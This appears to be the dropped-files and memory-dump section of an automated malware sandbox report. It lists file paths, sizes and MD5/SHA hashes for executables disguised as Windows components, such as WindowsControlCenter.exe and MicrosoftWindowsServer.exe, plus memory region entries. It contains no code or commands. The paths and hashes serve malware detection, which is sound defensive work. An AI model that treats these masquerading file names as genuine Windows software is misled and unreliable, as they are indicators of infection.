C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kvhz5mos.l5u.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp2D26.tmpWindowsControlCenter.exe

Filesize
3.1MB

MD5
fad2476602b0ad15599a43043d7a64f1

SHA1
53fe83e5618303ab45a0e848f4102221cf58a87c

SHA256
195c2fc12f46696d133f20f6810d555fc88a2b36f6a09ad4f2ef634c29eac811

SHA512
74b2bc9da25872057ac8cd919085f88e7fa3903ac2687d34e0e077ff6d101b92a4577ca96ebf99b07d2227ff1c7cda905c875f1992b25df158619faf1acf245d

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp2D26.tmpWindowsControlCenter.exe

Filesize
3.1MB

MD5
fad2476602b0ad15599a43043d7a64f1

SHA1
53fe83e5618303ab45a0e848f4102221cf58a87c

SHA256
195c2fc12f46696d133f20f6810d555fc88a2b36f6a09ad4f2ef634c29eac811

SHA512
74b2bc9da25872057ac8cd919085f88e7fa3903ac2687d34e0e077ff6d101b92a4577ca96ebf99b07d2227ff1c7cda905c875f1992b25df158619faf1acf245d

Download Submit
C:\Users\Admin\AppData\Roaming\MWS\MicrosoftWindowsServer.exe

Filesize
33KB

MD5
fe400f325a2c7dd6581aa66db002b847

SHA1
8474638ac4cb5dc11128cff5d56c6e0559bf9de8

SHA256
40175d0d99f5997724d290c09d0bc80c3f2e638ba8679b77af677c730f5869cd

SHA512
6f155b96bc23b82b530d1e8c2fd348850670c3ff17978a8ae8212f81c8fe62023aef3f867350d434e72dc6c31218556ad68624fa086d8c30e7334015eb495eff

Download Submit
C:\Users\Admin\AppData\Roaming\MWS\MicrosoftWindowsServer.exe

Filesize
33KB

MD5
fe400f325a2c7dd6581aa66db002b847

SHA1
8474638ac4cb5dc11128cff5d56c6e0559bf9de8

SHA256
40175d0d99f5997724d290c09d0bc80c3f2e638ba8679b77af677c730f5869cd

SHA512
6f155b96bc23b82b530d1e8c2fd348850670c3ff17978a8ae8212f81c8fe62023aef3f867350d434e72dc6c31218556ad68624fa086d8c30e7334015eb495eff

Download Submit
C:\Users\Admin\AppData\Roaming\WCC\WindowsControlCenter.exe

Filesize
3.1MB

MD5
fad2476602b0ad15599a43043d7a64f1

SHA1
53fe83e5618303ab45a0e848f4102221cf58a87c

SHA256
195c2fc12f46696d133f20f6810d555fc88a2b36f6a09ad4f2ef634c29eac811

SHA512
74b2bc9da25872057ac8cd919085f88e7fa3903ac2687d34e0e077ff6d101b92a4577ca96ebf99b07d2227ff1c7cda905c875f1992b25df158619faf1acf245d

Download Submit
C:\Users\Admin\AppData\Roaming\WCC\WindowsControlCenter.exe

Filesize
3.1MB

MD5
fad2476602b0ad15599a43043d7a64f1

SHA1
53fe83e5618303ab45a0e848f4102221cf58a87c

SHA256
195c2fc12f46696d133f20f6810d555fc88a2b36f6a09ad4f2ef634c29eac811

SHA512
74b2bc9da25872057ac8cd919085f88e7fa3903ac2687d34e0e077ff6d101b92a4577ca96ebf99b07d2227ff1c7cda905c875f1992b25df158619faf1acf245d

Download Submit
C:\Users\Admin\AppData\Roaming\WCC\WindowsControlCenter.exe

Filesize
3.1MB

MD5
fad2476602b0ad15599a43043d7a64f1

SHA1
53fe83e5618303ab45a0e848f4102221cf58a87c

SHA256
195c2fc12f46696d133f20f6810d555fc88a2b36f6a09ad4f2ef634c29eac811

SHA512
74b2bc9da25872057ac8cd919085f88e7fa3903ac2687d34e0e077ff6d101b92a4577ca96ebf99b07d2227ff1c7cda905c875f1992b25df158619faf1acf245d

Download Submit
memory/1316-787-0x000000001B6D0000-0x000000001B6E0000-memory.dmp

Filesize
64KB

Download
memory/1316-786-0x00000000008B0000-0x0000000000BD4000-memory.dmp

Filesize
3.1MB

Download
memory/1404-529-0x000001ECF66C0000-0x000001ECF66D0000-memory.dmp

Filesize
64KB

Download
memory/1404-530-0x000001ECF66C0000-0x000001ECF66D0000-memory.dmp

Filesize
64KB

Download
memory/1404-533-0x000001ECF66C0000-0x000001ECF66D0000-memory.dmp

Filesize
64KB

Download
memory/2132-304-0x000002051E6C0000-0x000002051E6D0000-memory.dmp

Filesize
64KB

Download
memory/2132-268-0x000002051E6C0000-0x000002051E6D0000-memory.dmp

Filesize
64KB

Download
memory/2132-267-0x000002051E6C0000-0x000002051E6D0000-memory.dmp

Filesize
64KB

Download
memory/2256-237-0x0000025EAB350000-0x0000025EAB360000-memory.dmp

Filesize
64KB

Download
memory/2256-238-0x0000025EAB350000-0x0000025EAB360000-memory.dmp

Filesize
64KB

Download
memory/2256-240-0x0000025EAB350000-0x0000025EAB360000-memory.dmp

Filesize
64KB

Download
memory/2344-755-0x00000237FBBD0000-0x00000237FBBE2000-memory.dmp

Filesize
72KB

Download
memory/2344-762-0x00000237FBA60000-0x00000237FBA70000-memory.dmp

Filesize
64KB

Download
memory/2344-638-0x00000237FBA60000-0x00000237FBA70000-memory.dmp

Filesize
64KB

Download
memory/2344-647-0x00000237FBA60000-0x00000237FBA70000-memory.dmp

Filesize
64KB

Download
memory/2344-716-0x00000237FBB70000-0x00000237FBB92000-memory.dmp

Filesize
136KB

Download
memory/2564-396-0x00007FF7B5630000-0x00007FF7B564F000-memory.dmp

Filesize
124KB

Download
memory/2564-766-0x00007FF7B5630000-0x00007FF7B564F000-memory.dmp

Filesize
124KB

Download
memory/2904-465-0x0000024B82F00000-0x0000024B82F10000-memory.dmp

Filesize
64KB

Download
memory/2904-463-0x0000024B82F00000-0x0000024B82F10000-memory.dmp

Filesize
64KB

Download
memory/3124-409-0x0000025FFAD80000-0x0000025FFAD90000-memory.dmp

Filesize
64KB

Download
memory/3124-418-0x0000025FFAD80000-0x0000025FFAD90000-memory.dmp

Filesize
64KB

Download
memory/3124-443-0x0000025FFAD80000-0x0000025FFAD90000-memory.dmp

Filesize
64KB

Download
memory/3636-178-0x00000143A05D0000-0x00000143A05E0000-memory.dmp

Filesize
64KB

Download
memory/3636-212-0x00000143A05D0000-0x00000143A05E0000-memory.dmp

Filesize
64KB

Download
memory/3636-179-0x00000143A05D0000-0x00000143A05E0000-memory.dmp

Filesize
64KB

Download
memory/3772-126-0x0000018558970000-0x0000018558992000-memory.dmp

Filesize
136KB

Download
memory/3772-160-0x0000018570B60000-0x0000018570B70000-memory.dmp

Filesize
64KB

Download
memory/3772-129-0x0000018570B60000-0x0000018570B70000-memory.dmp

Filesize
64KB

Download
memory/3772-131-0x0000018570C70000-0x0000018570CE6000-memory.dmp

Filesize
472KB

Download
memory/3772-130-0x0000018570B60000-0x0000018570B70000-memory.dmp

Filesize
64KB

Download
memory/3976-779-0x0000000005040000-0x0000000005050000-memory.dmp

Filesize
64KB

Download
memory/3976-780-0x0000000006280000-0x0000000006312000-memory.dmp

Filesize
584KB

Download
memory/3976-797-0x0000000005040000-0x0000000005050000-memory.dmp

Filesize
64KB

Download
memory/4192-771-0x00000000055C0000-0x0000000005ABE000-memory.dmp

Filesize
5.0MB

Download
memory/4192-770-0x0000000004B30000-0x0000000004B40000-memory.dmp

Filesize
64KB

Download
memory/4192-767-0x0000000000080000-0x000000000008E000-memory.dmp

Filesize
56KB

Download
memory/4192-769-0x0000000004A60000-0x0000000004AC6000-memory.dmp

Filesize
408KB

Download
memory/4192-768-0x0000000004990000-0x0000000004A2C000-memory.dmp

Filesize
624KB

Download
memory/4416-606-0x00000187F69B0000-0x00000187F69C0000-memory.dmp

Filesize
64KB

Download
memory/4416-608-0x00000187F69B0000-0x00000187F69C0000-memory.dmp

Filesize
64KB

Download
memory/4416-603-0x00000187F69B0000-0x00000187F69C0000-memory.dmp

Filesize
64KB

Download
memory/4868-360-0x000001AEFE420000-0x000001AEFE430000-memory.dmp

Filesize
64KB

Download
memory/4868-397-0x000001AEFE420000-0x000001AEFE430000-memory.dmp

Filesize
64KB

Download
memory/4868-359-0x000001AEFE420000-0x000001AEFE430000-memory.dmp

Filesize
64KB

Download
memory/5064-331-0x00000140693B0000-0x00000140693C0000-memory.dmp

Filesize
64KB

Download
memory/5064-329-0x00000140693B0000-0x00000140693C0000-memory.dmp

Filesize
64KB

Download
memory/5064-328-0x00000140693B0000-0x00000140693C0000-memory.dmp

Filesize
64KB

Download
memory/5112-554-0x0000023D40A80000-0x0000023D40A90000-memory.dmp

Filesize
64KB

Download
memory/5112-579-0x0000023D40A80000-0x0000023D40A90000-memory.dmp

Filesize
64KB

Download
memory/5112-545-0x0000023D40A80000-0x0000023D40A90000-memory.dmp

Filesize
64KB

Download
memory/5116-794-0x0000000003360000-0x0000000003370000-memory.dmp

Filesize
64KB

Download
memory/5116-795-0x00000000032C0000-0x0000000003310000-memory.dmp

Filesize
320KB

Download
memory/5116-796-0x000000001C680000-0x000000001C732000-memory.dmp

Filesize
712KB

Download
memory/5116-798-0x0000000003360000-0x0000000003370000-memory.dmp

Filesize
64KB

Download